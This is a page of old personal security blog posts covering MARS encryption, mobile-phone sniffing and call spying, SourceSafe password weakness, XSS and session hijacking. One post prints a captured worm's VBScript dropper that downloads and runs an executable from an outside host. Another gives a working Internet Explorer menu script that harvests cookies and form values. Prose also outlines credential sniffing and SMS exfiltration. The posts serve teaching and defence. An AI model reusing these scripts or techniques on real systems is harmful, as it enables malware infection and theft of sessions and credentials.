Search This Blog

Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts

Wednesday, December 30, 2009

Security presentation

Peace be upon you

Today I will not talk to much I have presentation to do I thought that it is better to add first on the blog :), anyways, this should the presentation at "Data Security" subject at the academy I am doing my diploma at, here is the presentation, please your feed back is very important



Thanks for your time.

BR
Ahmed Essam

Monday, December 14, 2009

MARS on iPhone

Peace be upon you

How are you guys? today I am going to show you something I have done as a data security assignment, the assignment was a presentation and application, me and other 3 guys were suppose to write something about MARS and Application, I helped in the Presentation and took the application :D, do you understand anything?

Well, let us begin the whole thing is about encryption algorithm called MARS, developer by IBM, you can find more about it

And here is the presentation


So, the idea is to make application for the ready made code of IBM, so the plane was todo simple application that do simple encryption and decryption, here is snapshots for the application, you can find the code here (Cocoa Touch Objective C project)

Lets see the application.

The application starts with the operation, you have to select wither you want to encrypt or decrypt
Enter the operation Key, in this case the "Encryption key"
Enter the data that you want to encrypt.
Here is the result, and as we use OFB + Random IV, when you reencrypt by just clicking back and next, you will get anther result
HEre is anther result for the encryption due to the IV + OFB
3rd result , Thanks to the OFB and IV
Save the file

Lets do decryption for what we have encrypted
Select Decryption
Then enter the key
Select the file name, you can enter free text in this page.
Now you have got your data


I have added little part for some fun it is the Mode of Operation , you can read more about it here

The mode that I have used was "OFB, output feed back"

I hope that you enjoy the application and the presentation :)
Thanks for your time.

BR
Ahmed Essam

Monday, April 28, 2008

Smart Sniffing on Windows Mobile

Peace be upon you

how are you Guys? sorry for the long absence, today I am getting a very "Evil" thing, actually I will not use it in evil, I will just demonstrate how this thing works and how it can be harmful, What I am talking about is something I named "Smart Sniffing",

What does "Smart Sniffing" means?
It means when the "Hacker" or "Intruder" sniff s/he will not sniff everything, why s/he would do that, for many reason, in our case, the Intruder will need to have just a few pieces of information, not all of it, let us have more details, our sample will be on windows mobile.

First of all you will need to have some tools to start in this operation,
  1. WinPCap for Windows CE.
  2. Windows mobile device to start your development and tests.
  3. Hotmail account.
Let us see what we have now, WinPcap is a free library that is use to capture network packets, well now you have all what is going in and out, for Windows CE version it is little tough but it is not impossible, then you will start watching what is going on, packets going out and packets coming in, now after you have accomplish your first step, let us move to the next step.

You will start looking in the packets for anything related to the password and user name, in the requests that go out from the device to certain server, there is Post requests, that what you are going to rip, if this trick didn't work for many reason on of them, the site uses some kind of SSL (Secure Socket Layer) so you can do something better than ripping the User name and password, you can rip the Session ID, there is too many ways to get what you want, after you have done with this step, the intruder notification step comes.

After you have done extracting the data you want from the packets and it is ready to be used by the Intruder, it will be sent simply and smooth by many ways, it can be sent through SMS, why I said that because may be the user uses some kind of "Firewall" and it will be easily to detect the what the application trying to send,of course the user will know that mobile sent SMS from the bill but the issue here is that the intruder get the piece of information as fast as possible, you can try to dig more and send what you want in sneaky way, like forcing the Internet Explorer to send it as encoded Query String.

What I have just said may seem to be evil but it is just Proof of concept that what ever "Smart Guys"say about mobile and its security, you have to be careful for the application you install on your device, also you have to be careful and try to notice everything on your screen, because there is always eye on you, may be you can't see it but be sure that this eye exist,all you have to do just be careful and try to keep your data as much as you can.

I have seen that before that some kind of Trojan was installed in X company PCs, the Trojan was working like virus, it wasn't detected by the anti-virus, the Trojan was so simple it was just graping the file names and send it to some e-mail Address, of course the Administrator was useless he didn't do anything to protect his company, anyways, don't rely that someone will protect you from any kind of attacks, also rememebr you may ask the wrong person for help so you have to do "Security" related things by your self.

Message to Developers, as you can see nothing is protected by default you have to protect your client as much as you can, it is your client, it is the reason of you raising, so try to keep your client safe, even after your death your work should be protected as much as possible, so you have to read about Encryption, Secure Systems, have certificate, learn the penetration test requirement and do it your self, read about secure code, ... etc
this topic is endless, all you have to do is just sake and be honest because such thing is really need very deep honesty, I am saying that because some how I am client and I hope to be protected.

I forgot to put some links :)
writing secure code
Secure Socket Layer
MSDN Writing Secure Code
WinPcap for Windows CE


I am sorry for the long post, may be I am over reacting but in the matter of fact and as I can see everything a round us is threated and we should be careful, that's all what I meant by this post, I put the idea, it is very simple but it can be used, also similar ideas used to have PC before and for sure there is people working on it now, as long as there is evil we should take care of our selves,

Thanks for your time.

BR
Ahmed Essam

Friday, March 14, 2008

RFID-> Security Flaw in Mifare Classic

peace be upon you

today post is so short and for some people it is shocking, some guys in "Radboud University" I think it is located in Netherlands have hacked into the RFID for "Mifare Classic" here is video and the link
Link: http://www.ru.nl/ds/research/rfid/



Thanks for your time

BR
Ahmed Essam

Sunday, March 09, 2008

Windows Mobile Hack Videos

Peace be upon you

How are you guys? someone suggest that I should publish the video of the "Turning windows mobile into spying device" in English, because some people get here in language other than arabic so here it is the videos in Arabic and English and I hope that you like it.
P.S: Sorry for my poor English :)

Original post link : http://www.ahmed-essam.com/2008/02/turning-windows-mobile-device-to-spying.html

English Demo
Link : http://www.youtube.com/watch?v=hESMx8zs8lM


Arabic Demo
Link : http://www.youtube.com/watch?v=ydotWSkX8PA



Thanks for your time :)

BR
Ahmed Essam

Monday, February 18, 2008

SIM card and Mobile

Peace be upon you

How are you guys? today I am going to talk deeper about the mobile security, I will take it from windows mobile side, because this what I have experience in, I am sure that there is similar in other mobile operating systems, first let us see this next picture,



This is image for smashed SIM card(I was done of it :D), here what is inside it, can u see the small chip, well it is real any SIM, has a very small processor with very small amount of memory, this cards called Smart cards, there is many many types of it, but let us get back to our point, SIM card is a type of smart cards that has processor and memory, for now it is OK, this thing has also something called Card OS, it is very small operating system, simply what it does is, it receive requests from the card reader, this card do the operation and reply back to the reader, the reader takes it and that's it, now what happens when Mobile starts up and try to have the signal from the mobile service provider, there is some kind authentication conversation must be done between the SIM and the Mobile network, what your device do is being a middle man, it takes result from SIM and give it to network, and take what network says and give it to Sim, that's cool for now.
The SIM card is divided into files, some files are protected and not readable by the reader, and some are password protected and some are open to be read with any kind of reader, I will try to add sample that explain all of that, here is some API's that may help any one to do SIM application related using windows mobile platform
To be continued
I hope that this post was informative and helpful.
Thanks for your time.
BR
Ahmed Essam

Wednesday, February 13, 2008

Turning Windows Mobile device to Spying device

Peace be upon you

how are you guys? I hope that all of you is OK, Today I am going to show you something little EVIL, it is turning the windows mobile device into spying device, somehow this thing is not right because it kills the privacy, I put it to just tell you how much it is dangerous to use any "anonymous" application on your device, first see the video and I have a lot to tell you about it.

English Demo
Link : http://www.youtube.com/watch?v=hESMx8zs8lM


Arabic Demo
Link : http://www.youtube.com/watch?v=ydotWSkX8PA



After you saw it, I think you are sure that it is possible to anyone have some knowledge, can easily do utility apllication for free and attach such thing in this application, I decide to reveal all I know about it, for 2 reason I do that, the first reason that the resources is so hard to get, you can't imagine how much I suffer until I got this thing work, all people I know refused gently to help me and give me such resources, resources like some files from platform builder, some how I managed to get a FULL copy of platform builder :D, which some how make me free, also the learning material is so hard to get, the only resource I found for this topic was in Korean Language(Thanks to google), the second reason the one who want to do such thing has enough motivation to comlete it, here is the details.
Technical detailsin this trick I used something called (RIL APIs), RIL stand for "Radio Interface Layer", this thing is made to serve anything related to network on the Windows mobile powered devices, it is also called RIL proxy because some how it is a mini driver that is implemented by the manufacturer, the functions that I have used was so simple
RIL_Initialize
RIL_EnableNotifications
RIL_Answer
This trick takes about 15 to 20 lines of code, this thing can be used in two sides, for good, you can do many useful application like "Incoming Blocker" or "Answer Machine" also there is endless list you can do using this simple APIs,for evil there also tons of ideas that can be done for it, by the way this thing can work over anything, I mean it can moitor GPRS, SMS, ... etc
Ideas for protectionI though that there is some way to protect the device owner from being attacked that way,so here is my idea, the idea is based on how windows works, as I know about windows, when you have a handle for something "File, Device, Resource, ... etc" this handles is called Kernel Object as long as it has security attribute in it's creation parameter, but in this case we have no creation parameter which make me step back for and think , we can hook on the "ril.dll", so we will be like the middle man, this thing is great but hooking in windows mobile is not that easy, it require alot to have something working without trubles or delaying the system, the alternative way is little amateur, it is to loop through open processes and see if any of its loaded module is "ril.dll", if you find something then notify the user, but this one is very performance consuming because you will have to do check every few second or minutes, which has some problems, if you have long period (the idea is gone, becuase any application that uses ril.dll could work for long time, while your portection application is not working) if you make it short period you will face the performance issue.

I hope that this topic was informative to you, thanks for your time



BR
Ahmed Essam

P.S: This articl is based on personal research, so it is not evolved in any application I have worked on before.

Wednesday, December 26, 2007

Sourcesafe Hackability

Peace be upon you,
Today I am going to hence about something that is critically dangerous, it's SourceSafe, I recommend to read the coming paragraph it will save lot of explanation


"Quoted" - http://keir.net/vsscrack.html

Visual SourceSafe (VSS) has a very weak password management system. There is one file stored within the VSS directory structure on the VSS server called um.dat (usually in the data sub-directory). This file contains all user names together with a hash of their passwords. The hashing process is poorly designed and insecure, not just due to the size of the resultant hash (2 bytes!) but also due to the extremely simple algorithm used to generate it. Such is the weak nature of the hashing algorithm that there are literally hundreds of easily obtained passwords that result in the same hash as the real password. In other words, the hashing algorithm used is extremely prone to collisions. So just bear in mind -- the passwords that this program produces are not necessarily (and in fact are probably NOT) the actual passwords initially created by the user, but will still give you the same level of access to VSS as if you had used the same original password. As an example, using a largish word list, my own password hash produced nearly 600 equivalent matching passwords, none of which was the true original but any of them could have been used in place of it.

Now after you read that, it is matter of minutes to crack the toughest password in SourceSafe, I just want to draw your attention that there is lots of other tools that work as source control with more safety and flexibility also it's open source which means you can develop your own version of source control with custom security you made or install from anywhere as plug-in, By the way, threre is HELL of tools that crack SourceSafe Password, also there is no way to secure it, as long as user has access to the Password file, it is done, anyways here is some recommendation for source control application that can be used to protect our code,

http://en.wikipedia.org/wiki/Concurrent_Versions_System
http://svnbook.red-bean.com/

Personal recommendation for client tools
CVS - http://www.tortoisecvs.org/
SVC - http://tortoisesvn.tigris.org/

Hope this article informative and helpful

P.S: there is many tools around I didn't want put any of it, to avoid anything that may cause trubles

BR
Ahmed Essam

Sunday, April 29, 2007

Catching a worm

Peace be upon you

it was a tough day to me, :D I was installing windows and other things that I used to use on my machin, anyways the first thing I do after installing windows is to install MSN, I got Message from someone very imortant to me, he/she sends me a link

http://th ecool pics.net/don tclick.jpg

DOn't OPEN THIS LINK IT HAS THE WORM


I opened the link, and I noticed it cause a very dilay on my machin, I said to my self wait for a second to see what is coming, nothing the page was so normal, after while I tried to open "RUN" and I found that it is "Restricted", also the Task Manager,
I used "Process Explorer" and I found that there is a very strange processes, I got MAD, WORM ON MY MACHIN, of course I tried all the old tricks, Safe mode and try to restore and workin restore point, but NOWAY, they guy who made it is very clever, he expected what I am going to do and he / she deleted my restore application :D, for his/her bad luck that I always have a running copy of windows that I don't touch, I use it only for emargance, :D I got a copy of the system restore applicaiton and I get back to clean working point :D, and I decide to know what is the hell is going on :D
I got the like that I mentioned before, I downloaded the image and I found that it is redirect to some other place that redirect ot ver far place :D , at last I got this code



of course anyone know Javascript will know esacp and unescap functions, I did a very simple page that unescae this content and put it in TextArea, and I found a very nice simple code for encrypting the content "dF(s)" this was the function name, I did anther Textarea to put the output of the Textarea , and what I saw make me get shocked :D, simply I don't update my internet explorer for this stupid exploit

I got the code that copies the worm to my machin

and here it is





< language="VBS_C_R_I_P_T">
on error resume next
dl = "http://ns1.hosting101.biz/~metalurg/images/template/YMworm.E_x_E"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="IEXPLORE.E_x_E"
set F = df.createobject("S_C_R_I_P_Ting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< / s_c_r_i_p_t>

< language="VBS_C_R_I_P_T">
on error resume next
dl = "http://ns1.hosting101.biz/~metalurg/images/template/worm2007.E_x_E"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&amp;a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="EXPLORE.E_x_E"
set F = df.createobject("S_C_R_I_P_Ting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< / s_c_r_i_p_t >

now after I got this simple javascript code that copies a stupid executable and run it on my machin, I have downloaded this file and I open it with Notepad :D don't laugh I don't have anything now on my HD, I found that it is encrypted , I searched for the file name with the beloved google and I foun this link that tells a lot about the virus
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SOHANAD.AL&VSect=T

I wish this topic useful to you, and I want to say something at last "DO N'T TRUST SOMETHING U DON'T SEE, remember there is opictal illusion :D so Don't trust anything :D"

Saturday, April 21, 2007

Hacking source-safe

Peace be upon you

hi people this topic will be very short, it is just a little note for Source-safe administrator,
your safe can be cracked , which means that the source code is not secured anymore, simply it can be hacked because of some human faults, people always do some brute force attack, all I can say for you that password hashing in source-safe isn't good, but you have to make some policies for protecting your code this is by making a good users hierarchy, don't give Administration permission for anyone who deal with code, use misleading names for administration permission, DO NOT EVER USE THE ACCOUNT ADMIN, there is tools that crack source-safe passwords, I think you have to make a lot of fake users, try to find any plug in for source safe that do tracking for the whole event happening on the code, that's all I can say for now, I will try to get some cases that has more help , right now I can't talk a lot about it, because if said more it will be like "how to hack source safe", for now it's ok, I will try to provide some live samples, thanks for time

Monday, March 26, 2007

Handle-x became international tool for hacking

Peace be upon you

My friend Ahmed Ezz recived this mail, Ahmed Ezz developed a Famous Application for network management called Handle-x , the Application is a open source, you can find it at planet source code

here is the mail he got and check how it is amazing to have such a thing :)



Hello,, its me again.. the Handle-X fan :D :D .. how are you?
how is work going with you? .. hope everything is fine.. oh i have a
website now :)
its www.darkmindz.com,, i will be glad if you took a look :) ,,, well
yesterday a guy was showing of about this trojan he made... so i took
alook at the video he made while hacking someone with it,, AND GUESS
WHAT,, the guy is a fake, he is using your trojan Handle-X as his!!!
so i thought you wanted to know cause you worked on it, and its a
brilliant program..

here is the link http://video.google.fr/videoplay?docid=8575265141611654699
check the video on the left panel, and you will seee "Handle X" this
guy owns a website too..
its www.deadly-hackers.com ,,

anyways have a good day..
thanks Ezz for your great work and ALLAH bless you :)

Sunday, February 11, 2007

Attacks using external.menuArgument

if you want to see the Artical in better view
http://www.codeproject.com/useritems/externalmenuArgument.asp


New way to get all web page information


The idea:  the core idea of this trick that is in Internet Explorer there is little back door to get all information of the web page and change it's content, the trick is in registry  at the key


 


HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\


 


In this key you can add new item to internet explorer context menu for example if you add this key


 


HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\~~~~~~Get All Page Info~~~~


You will have this view 


Sample screenshot


 


The second part of the trick is in the next link


http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/reference/properties/menuarguments.asp


 


The Property menuArgument gives you ability to write vb and java scripts that run on the client area and you have to know that menuArgument is part of external object


http://msdn.microsoft.com/workshop/author/dhtml/reference/objects/external.asp


 


if you collect all that together you can write script that will be called by the menu and do what every you want to with the page, here is example that read all cookies information , all forms information and all elements in the forms then save it in text file on C:\Infomation .text


 







<script language=vbscript>
on error resume next
    set EventElement = external.menuArguments.document
    FilesFolder = "C:\MyHacks\GrappedFiles"
    set t=createobject ("SCRIPTING.FILESYSTEMOBJECT")
    if not t.FolderExists(FilesFolder) then t.CreateFolder(FilesFolder)
    strFileName = FilesFolder & "\" & CleanString( EventElement.title & "___"  & date & "_" & Time ) & ".txt"
    set l=t.OpenTextFile(strFileName,8,true)
   
    l.Write "/////////////////////////////// New Hacky ///////////////////////////////"  & vbCrLf
    l.Write "Url is = " & EventElement.url & vbCrLf
    l.Write "Page Title is = " & EventElement.title & vbCrLf
    l.Write  EventElement.cookie & vbCrLf  & vbCrLf  & vbCrLf


   


for i = 0 to EventElement.forms.length -1
    l.Write "_-_-_-_-_-_-_-_-_-_-_-_-_ Form infomration _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_" & vbCrLf
          l.Write " Form Name = " & EventElement.forms.item(i).Name & vbCrLf
          l.Write " Form Action = " & EventElement.forms.item(i).action & vbCrLf
          l.Write " Form Method = " & EventElement.forms.item(i).method & vbCrLf
          l.Write " Elements Count = " & EventElement.forms.item(i).elements.length & vbCrLf
   for ele = 0 to EventElement.forms.item(i).elements.length-1
          l.Write "------------------------- Element infomration ------------------------------" &  vbCrLf
          l.Write " Information for element number " & ele + 1 & vbCrLf
          l.Write " Elements Name = " & EventElement.forms.item(i).elements.item(ele).name & vbCrLf
          l.Write " Elements Value = " & EventElement.forms.item(i).elements.item(ele).value & vbCrLf
   next
next
          l.Write vbCrLf & vbCrLf  & vbCrLf
          l.Write "Thanks to GOD to give me power to learn and teach."
          l.Write "Pray for me to learn more to be able to learn you" & vbCrLf
          l.Write "الحمد لله , الهم أرزقنى علما نافع و رزقا واسع و شفاء من كل داء"
          l.Write vbCrLf & vbCrLf  & vbCrLf 
    l.close
Function CleanString(strTarget) ' this function will clear the unacceptable characters for file name
 strTarget = Replace(strTarget, """", "-")
 strTarget = Replace(strTarget, "'", "-")
 strTarget = Replace(strTarget, "\", "-")
 strTarget = Replace(strTarget, "/", "-")
 strTarget = Replace(strTarget, "|", "-")
 strTarget = Replace(strTarget, ">", "-")
 strTarget = Replace(strTarget, "<", "-")
 strTarget = Replace(strTarget, "*", "-")
 strTarget = Replace(strTarget, ":", "-")
 strTarget = Replace(strTarget, "?", "-")
 CleanString = strTarget
End Function
external.menuArguments.window.alert("All data are in the file " & vbcrlf & vbcrlf & strFileName)
</script>



 


As you can see simple vbscript file that 100% depends on external.menuArguments , it collect the data which you want then save it on TXT file


 


In the upcoming part of this series I will give some tips on how to change in the main document and do what ever you want , it will help so much in some attacks, and I will explain how to protect the web pages against this attacks, before closing here is the steps to install this script and test it


 


Step 1: copy file HackingScript.htm to any folder and get the file path


Step 2: open " regedit " from run and navigate to the key


 HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\


Step 3: Add new key with the name "~~~~~~~~~Get All Page information~~~~~~~~"


Step 4: change the default key value to the HackingScript.htm path as you did in the first step


Step 5: open internet explorer and start right click and click on our new menu  


Step 6: you will find file C:\Information.txt contain all information of the page.


 


I wish you like the article, wait for the next part which will contain how to use this type in attack such "Page Simulation" and "Session HiJacking", in the next part I will explain how to protect your application against these attacks, have a nice article ;)


 


Thanks for your time


 


 


Attached to the article 2 files


HackingScript.rar :  contain the HTML file and Registry file which contain all in the article


HackingScript.exe : SFX file which can be installed directly to C:\ and add the menu to IE


 


There is one thing I want to mention somepeople ask what is going to happen if i use this script "it will get MY DATA" I just want to say that this script are able to modify things can't be done without this trick. try to use your imagination and guess what can you do with that, I write more in this topic, because it will be really harmful,:) I will explain later how to protect your web site from such things

Wednesday, January 03, 2007

How can you see your Session ID???

Peace be upon you

Some people contact me and say that the story of the session id is not reasonable :D, and it seems not OK for them to believe it :D, anyways I have a little prove here to see it,
when you log in your anything account ( yahoo,hotmail,gmail,KokoMail,... ) write this line in the address bar

javascript: window.clipboardData.setData("Text", document.cookie);window.alert('Done');

when you got the Message "Done", open the notepad and paste what in clipboard, what you are seeing is your "SESSION-ID",
it will not work in one condition, if you turn the javascript support in the browser

by the way this trick will work on any operating system with any type of browser "tested on Firefox and internet explorer", not working with Opera

thanks for your time
yours
Ahmed Essam

Monday, December 25, 2006

What is Session ID and session hi-jacking?

Peace be upon you
My Dear Friend Mohamed Shehata asks about the session ID, now I am explaining it,
First have a look for this figure


When the user hit the web site name, what is happening?
actually there is a lot of hidden things happen and even some developers don't know what is happening or how is it happen, here we start
User hit the site name: The server do inital things to connect you to the excution of script (ASP,PHP,...)
Server creates a cookie in the client machin, this cookie called Session ID,
for sure any developer know and uses the Session Object, but do anyone think how the session id works, and how the session ID get to you the right information, it is simple, Script Engine(ASP Engine, PHP engine,...) do this for you, the engine creates the session ID which is the Key for the whole data row, the data row is the data you save in the session object, which is filtered by the session id which is save in the Client machin
did you got it ?:D
who the Hacker uses all of this, simply there is technique called session hi-jacking, this is depending on stealing the session from the client machin,this way when the engine tries to get the session id from the hacker machin the engine will not say anything it will give the web application the information depending on the session id,
this is way the hacker appear to the web site as the normal user,
how can the user get out of this trick, NO WAY FOR THE USER TO PROTECT HIM SELF
because as long as the hacker got your session id, then he is you :D, it's like passport without photo, as long as u carry it then anyone carry it will be the one,
How can developer protect his application from such attacks?
the beloved MSDN give us a little solution check this link out
MSDN TOPIC ABOUT SESSION HIJACKING
it really gives the key to protect your application and user from such attacks,


How do this thing used in hacking hotmail account?
when you login, someone send you link, you open it
the page redirect you to infected page of MSN ( infected with XSS Exploit ), the script is passed in the query string, but I grantee you will never see it, the encode it to HexaDecimel,
the script simply get all cookies in your session and pass it to other site, that save your data,
as long as you don't sign out, your session is a life, so u have to kill it by "SIGN-OUT", after that you are disappear for the site, if the hacker take your session ID and tries to use it, he will find that you are not signed in, simply he will be asked to enter the user name and the password, this way protect you but not so much, as I said before , you have to open any link came to you in other browser, WHY
because when you click on the link and when new window open, it inherit all of it's cookies with it, which means
when you open link, it will popup new window, this window contine the link that will still your information, when the hacker redirect you to MSN again (to steal your session id) he will get your data,
I wish it is useful

thanks for your time
Ahmed Essam

Kick it Please
kick it on DotNetKicks.com

Friday, December 22, 2006

How do hackers Hack hotmail accounts?

Peace be up on you

some people talk to me before was wondering "How do hacker change thier hotmail accounts?"
simply I will explain how this thing works but I will not tell you how to do it :D because it's so evil, anyways let's begin

first of all the hacker depend on a famous error that no "Web Developer" full into it this Error is called XSS or Cross Site Scripting, the cross site scripting is a little problem that enable anyone to change something in the page content through the query string, that is passed between the web pages in a site, this is the first thing that hacker look for on the sites like "MSN" and "Hotmail"
the next stage is "Stealing your Session ID", but what is the session ID, Session Id is something like that enable the server to know that you is you :D, in anther way you can say that this Session ID hold a key when you request something from the server the server will check something like a table and get the rest of your information by it,
what is the problem then ? the problem is that this session ID is stored as cookies which means that anyone can get and it's so simple-check this topic "I have wrote it before" http://www.codeproject.com/useritems/externalmenuArgument.asp- after that the hacker send you something so normal that you will never doubt, the hacker will send you a link that will redirect you to any page that has the "XSS" problem, and it will contain a small script that take your session id and send it to anther site,
now the hacker has your session ID, but how he will use it, simply did you use opera browser before, this is the simplest way he will use opera to change his/her session id to appear to hotmail or MSN that he/she is you, after that he can , so anther trick that enable him/her to change your Email password, it depend on the same issue,
how to protect your self? it's little tough but you have to do it
Don't open any link by just clicking on it, copy it and open in anther browser
the other way it will be more tough is to disable the Javascript on the browser
the last note is to sign out after you do what you want to in your Email account,

I wish it really help please if you find anything wrong please post comment, we all seeking to learn :)
thanks for your time reading it :)

if you don't mind kick it for me :) kick it on DotNetKicks.com